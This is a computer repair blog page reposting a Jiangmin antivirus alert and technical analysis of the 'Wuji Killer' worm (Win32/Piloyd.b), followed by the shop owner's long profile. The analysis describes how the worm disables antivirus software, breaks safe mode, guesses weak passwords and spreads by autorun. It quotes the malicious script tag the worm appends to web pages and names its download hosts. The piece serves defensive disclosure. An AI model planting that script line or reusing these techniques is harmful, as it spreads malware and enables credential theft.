“無極殺手”病毒年終爆發 平均每日感染超過萬台電腦 |
11月16日 ,江民全球病毒監控系統、雲安全防毒系統監測到一個名為“無極殺手”變種b(Win32/Piloyd.b)的病毒正在網際網路上瘋狂傳播,該病毒在短短20天的時間內就感染了37萬餘台電腦,更是躍升到江民病毒排行榜的第四位。 據江民反病毒專家介紹,Worm/Piloyd家族近期更新十分頻繁,其中以“無極殺手”變種b(Win32/Piloyd.b)最為明顯。該病毒運行後,會試圖關閉大量安全軟體的相關進程(《江民殺毒軟體》不會被關閉),並利用註冊表映射檔劫持技術,使得這些安全程式下一次使用時無法再啟動;當發現系統中有特定的安全軟體存在時,病毒就會釋放惡意驅動程式以結束安全軟體的自我保護。 同時,病毒會通過自帶的弱密碼列表對網路上的芳鄰進行猜解,被猜解成功的電腦將受到病毒的感染,病毒會感染電腦上的“exe”、“htm”、“html”、“asp”、“aspx”和“rar”檔,當用戶運行這些受感染的可執行檔時,將會啟動病毒,自動連接駭客指定的網站“http://bbnn7*.114central.com”,下載大量惡意程式,在所下載的惡意程式中有90%以上都是盜號木馬病毒,嚴重威脅用戶私密資訊安全。 江民反病毒專家提醒廣大用戶,由於該病毒還可以通過移動存儲設備進行傳播,因此建議用戶關閉系統自動播放功能或插入USB碟後在自動播放功能表中選擇殺毒軟體對USB碟進行接入前掃描,及時升級《江民殺毒軟體》病毒庫並對整個電腦系統進行檢查清理。 為了避免遭受更多的未知病毒侵害,反病毒專家建議安裝具備主動防禦“沙盒技術”和啟發式掃描功能的正版殺毒軟體,開啟《江民殺毒軟體》主動防禦系統監控功能,該功能可對病毒試圖下載惡意程式、強行篡改系統時間、注入進程和調用其他惡意程式等行為進行監控並自動干預、處理,有效地遏制了未知病毒對系統所造成的干擾和破壞,更大程度的提高了電腦對於未知病毒的防範能力,確保用戶電腦免遭病毒侵害。 |
江民發佈“無極殺手”病毒(Piloyd.b)技術分析報告 |
11月16日 ,江民反病毒中心監測到,一個名為“無極殺手”變種b(Win32/Piloyd.b)的病毒正在網際網路上瘋狂傳播,該病毒在短短20天的時間內就感染了37萬餘台電腦。 江民反病毒專家分析,病毒運行後,生成qmgr.dll病毒檔,載入sfc_os.dll並查找其5號導出函數,使得系統的檔保護對於其要修改的qmgr.dll失效,然後病毒從資源中讀取資料寫到qmgr.dll,修改該檔時間,並啟動對應的服務。然後在系統目錄下把自身複製為lsasvc.dll並在臨時目錄釋放“TempDel.bat”以刪除自身。 病毒檢查當前模組所在進程是否為360tray.exe,如果是則創建一個名為"360SpShadow0"的設備,通過發送IO控制碼的方式控制繞過360tray.exe的檢測,完成後,退出程式。 查找當前系統中是否存在進程"360tray.exe",如果有,則將%SystemRoot%\system32\qmgr.dll複製為%SystemRoot%\system32\ 1l 1.dll,將%SystemRoot%\system32\ 1l 1.dll注入到目標進程空間,從而第一步的內容得到執行,完成後,刪除%SystemRoot%\system32\ 1l 1.dll,同時清空hosts檔。 完成以上動作後,病毒會創建多個線程執行不同操作: 將qmgr.dll對應的BITS服務啟動類型設置為自動。 刪除如下HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network破壞安全模式 然後在暫存檔案夾內創建一個名為LiTdi.sys的驅動,創建名為LiTdi服務,並啟動服務。查找相關殺毒軟體或安全軟體進程,並向驅動發送IO控制碼的方式結束相關進程。 病毒還會調用IE訪問http://nbtj.114anhui.com/msn/163.htm做感染統計。從表項中依次選擇下載十幾種惡意程式,其中多數為盜號木馬。 病毒還會感染可移動存儲設備上的exe,rar,htm,html,asp,aspx文件,對於副檔名為.rar的檔,病毒還會解包感染以上副檔名檔後再壓縮回去。對於htm,html,asp,aspx的網頁檔,病毒會在其尾部加上“<script language=javascript src=http://mm.aa88567.cn/index/mm.js></script>”的惡意代碼,使得這些網頁檔成為病毒的二次傳播源,用戶一旦點擊這些被感染檔,則會被病毒感染。 病毒還會通過自動播放功能傳播。查找可移動存儲設備並在其根目錄下生成autorun.inf,建立一個名為recycle.{645FF040-5081-101B -9F 08-00AA 002F 954E}的文件夾,把%SystemRoot%\system32\dllcache\lsasvc.dll複製到該目錄下為Ghost.exe。 通過自帶的弱密碼列表對網路上的芳鄰進行猜解,被猜解成功的管理員帳戶密碼的電腦將受到感染;如果連接成功,則將C:\WINDOWS\system32\dllcache\lsasvc.dll拷貝到對方機器的C:\cm.exe,同時創建計畫任務以啟動該病毒。 針對該病毒,《江民防毒軟體》已緊急升級,用戶只需升級殺毒軟體到最新病毒庫,開啟主動防禦和即時監控,即可有效防禦病毒,免遭“無極殺手”病毒侵害,確保電腦資料安全。 |
藤小二的簡介與維修公告需知
㊣藤小二在大學時期就已經具備電腦基本DIY的能力,於2005年退伍後即正式踏入電腦業,並在正規電腦經銷商公司磨練四年資歷,也開始累積了大量的維修經驗。於2009年在台中市一中街開設電腦修配坊工作室,提供桌上型電腦專業檢修服務,為合法立案登記營業及註冊商標,可提供免用統一發票收據,讓消費者可以放心讓本店做服務及面對面溝通。客戶來電(Line)預約送修時間為早上9點到下午五點前,請先當日預約後再送修,其餘時間一律不受理預約維修,超過九點就不要再LINE,會打擾到藤的休息時間,遇到白木或來亂的,即直接封鎖。電腦要送修前建議先Google本店位置,若找不到位置或是沒有預約的,一律不收件!藤的LINE與電話是讓客戶預約維修、電腦組裝及老客戶連繫之用途,不是用來空中電話問診,也不是讓你做技術諮詢的;有問題者請直接在BLOG留言即可!否則也一律封鎖!藤小二沒有回應網友問題的義務,電腦尚未檢測前,無法告知維修費用及檢測費啦!微利造成劣幣驅逐良幣,巧婦難為無米之炊呀!情可少賺也勿硬賺!有很多千里馬(維修人員與使用者),但卻少有熱衷維修的專業伯樂!讓藤來做你的專業電腦醫生唄!藤自信,讓客戶預約維修方式,才能提供更優的維修素質&品質,反倒是一直收件也沒有專業檢測SOP的,只會讓消費者傷錢又傷心!若有鄉民&同業,無法認同藤的維修理念&經營Blog方式,請不要在此地潛水,怕您會溺水,同時也請尊重私人領域!藤小二本人檢修及組裝過的電腦至少有五位數的案例以上,這不是老師傅,那什麼才是? 如果您在網路上有看到有同行或屁孩抱怨藤老二的口氣及服務態度很差很跩,那是真的,因為老是有網友及USER總是喜歡用比價及挑CP值去組高效能電腦,又老愛不懂裝懂,也會東問強者朋友西問鍵盤網友,又想要我們提供良好售後服務,這不是蠢? 花錢就是大爺?錯!「只有一流的客人,才配得上一流的服務」!藤小二也不會關切01,PTT,巴哈的網友文章,如果有鄉民酸言作亂或同行黑,讓他們隨意就好!但說真的,很多網友及客戶跟藤小二接觸之後,才發現藤小二其實是面惡心善,暖男哥一位,人也很好相處的。買賣電腦,不是客戶付錢最大,而是藤小二不賣你最大!藤哥2019年升級藤爸,有了小三小四,目前每天下午五點半就要忙著去學校接小朋友回家照顧了。2020年告誡台中太平區的消費者,若要送修或購買電腦,千萬要慎選店家,某天助自助無助工作室老闆很會業務嘴,賣電腦未開收據或發票/未提供主機板外盒及產品保證書/零件未貼銷售日期/電腦交易單有陷阱/零件保固縮水/Win7序號啟用Win10系統/零件以製造月起算保固而非註冊日起算,而且也不提供板卡序號,請慎重選店家。在台灣,消費者送修電腦及購買電腦,往往是肥羊冤大頭,唯有挑選老牌藤小二,讓你Easy用電腦,有問題即可用Line回報及討論,這就是電腦服務!2022年開始,購買電腦一律先填電腦訂購表單,否則不予報價;提供「中租」零卡分期購買電腦;客戶可加入藤哥專屬Line社群。
- Nov 19 Thu 2009 14:07
“無極殺手”病毒年終爆發 平均每日感染超過萬台電腦
全站熱搜
留言列表